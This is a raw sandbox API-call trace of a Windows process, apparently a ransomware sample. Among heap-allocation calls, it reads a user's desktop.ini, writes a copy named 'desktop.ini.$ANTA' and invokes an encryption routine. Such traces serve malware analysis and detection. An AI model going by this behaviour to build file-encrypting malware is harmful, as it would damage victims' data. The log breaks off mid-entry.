[0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x17e2728 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1797108 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf8d8 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca730 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfb30 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6b8 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfbf8 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25d0 | out: hHeap=0x1780000) returned 1 [0122.790] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca880 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca838 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cf978 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfc48 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0122.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20a) returned 0x43ea040 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ea040 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25c0 | out: hHeap=0x1780000) returned 1 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0122.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac640 | out: hHeap=0x1780000) returned 1 [0122.791] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43c9cb0 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.791] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.791] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4f0 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac640 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x43eb450 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca778 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25a0 [0122.792] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x258 [0122.792] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0122.792] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144eeb0 | out: lpNewFilePointer=0x0) returned 1 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb30 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4c0 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25d0 [0122.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43c9cb0 | out: hHeap=0x1780000) returned 1 [0122.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4f0 | out: hHeap=0x1780000) returned 1 [0122.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfae0 | out: hHeap=0x1780000) returned 1 [0122.792] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.792] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.792] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796e08 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796e08 | out: hHeap=0x1780000) returned 1 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.793] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac6c0 | out: hHeap=0x1780000) returned 1 [0122.793] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2700 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfa18 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26a0 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26a0 | out: hHeap=0x1780000) returned 1 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6e8 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796ea8 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796ea8 | out: hHeap=0x1780000) returned 1 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.793] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2660 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4a8 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2710 [0122.793] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26e0 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca490 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e25b0 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2610 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392340 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2670 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x60) returned 0x43596c0 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca490 | out: hHeap=0x1780000) returned 1 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43921b8 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4a8 | out: hHeap=0x1780000) returned 1 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x43923b0 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43596c0 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca670 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392340 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43921b8 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2640 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.794] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26e0 | out: hHeap=0x1780000) returned 1 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2720 [0122.794] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x40) returned 0x43a8f00 [0122.794] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43a8f00 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2720 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43923b0 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca658 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac100 [0122.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10000) returned 0x499a008 [0122.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca658 [0122.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e26a0 [0122.795] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\desktop.ini.$ANTA" (normalized: "c:\\users\\fd1hvy\\desktop\\desktop.ini.$anta"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0122.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfb58 [0122.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca670 [0122.795] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2640 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6e8 | out: hHeap=0x1780000) returned 1 [0122.795] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfa18 | out: hHeap=0x1780000) returned 1 [0122.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2700 | out: hHeap=0x1780000) returned 1 [0122.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2560 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2560 | out: hHeap=0x1780000) returned 1 [0122.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e26d0 | out: hHeap=0x1780000) returned 1 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac200 [0122.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x41ac200 | out: hHeap=0x1780000) returned 1 [0122.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac6c0 [0122.796] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfba8 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2590 [0122.796] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2590 | out: hHeap=0x1780000) returned 1 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca550 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2710 [0122.796] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796f28 [0122.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796f28 | out: hHeap=0x1780000) returned 1 [0122.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.799] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2710 | out: hHeap=0x1780000) returned 1 [0122.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca538 [0122.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca6a0 [0122.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2540 [0122.799] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x100000) returned 0x3e0f020 [0122.802] SetFilePointerEx (in: hFile=0x258, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x144ef00 | out: lpNewFilePointer=0x0) returned 1 [0122.802] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x11a, lpOverlapped=0x0) returned 1 [0122.803] ReadFile (in: hFile=0x258, lpBuffer=0x43eb450, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x144ef28, lpOverlapped=0x0 | out: lpBuffer=0x43eb450*, lpNumberOfBytesRead=0x144ef28*=0x0, lpOverlapped=0x0) returned 1 [0122.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca6a0 | out: hHeap=0x1780000) returned 1 [0122.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2540 | out: hHeap=0x1780000) returned 1 [0122.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca538 | out: hHeap=0x1780000) returned 1 [0122.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.803] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11a) returned 0x43cc1c8 [0122.803] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x3e0f020 | out: hHeap=0x1780000) returned 1 [0122.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca688 | out: hHeap=0x1780000) returned 1 [0122.805] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca550 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfba8 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25c0 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11a) returned 0x43cce80 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cc1c8 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.806] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2660 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfce8 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca4d8 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e25b0 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11a) returned 0x43ccfa8 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e25b0 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ccfa8 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2670 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43ca4d8 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43cfce8 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2660 | out: hHeap=0x1780000) returned 1 [0122.806] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2630 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x18) returned 0x1796fc8 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x1796fc8 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.806] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2610 | out: hHeap=0x1780000) returned 1 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x38) returned 0x41ac700 [0122.806] PeekMessageW (in: lpMsg=0x144f2dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x144f2dc) returned 0 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2610 [0122.806] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x4) returned 0x43e2630 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x30) returned 0x4392298 [0122.807] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0122.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x4392298 | out: hHeap=0x1780000) returned 1 [0122.807] HeapFree (in: hHeap=0x1780000, dwFlags=0x0, lpMem=0x43e2630 | out: hHeap=0x1780000) returned 1 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cfae0 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x1) returned 0x43e2660 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x20) returned 0x43cf900 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x10) returned 0x43ca688 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e2670 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x8) returned 0x43e26d0 [0122.807] RtlAllocateHeap (HeapHandle=0x1780000, Flags=0x0, Size=0x11a) returned 0x43ccfa8 [0122.807] 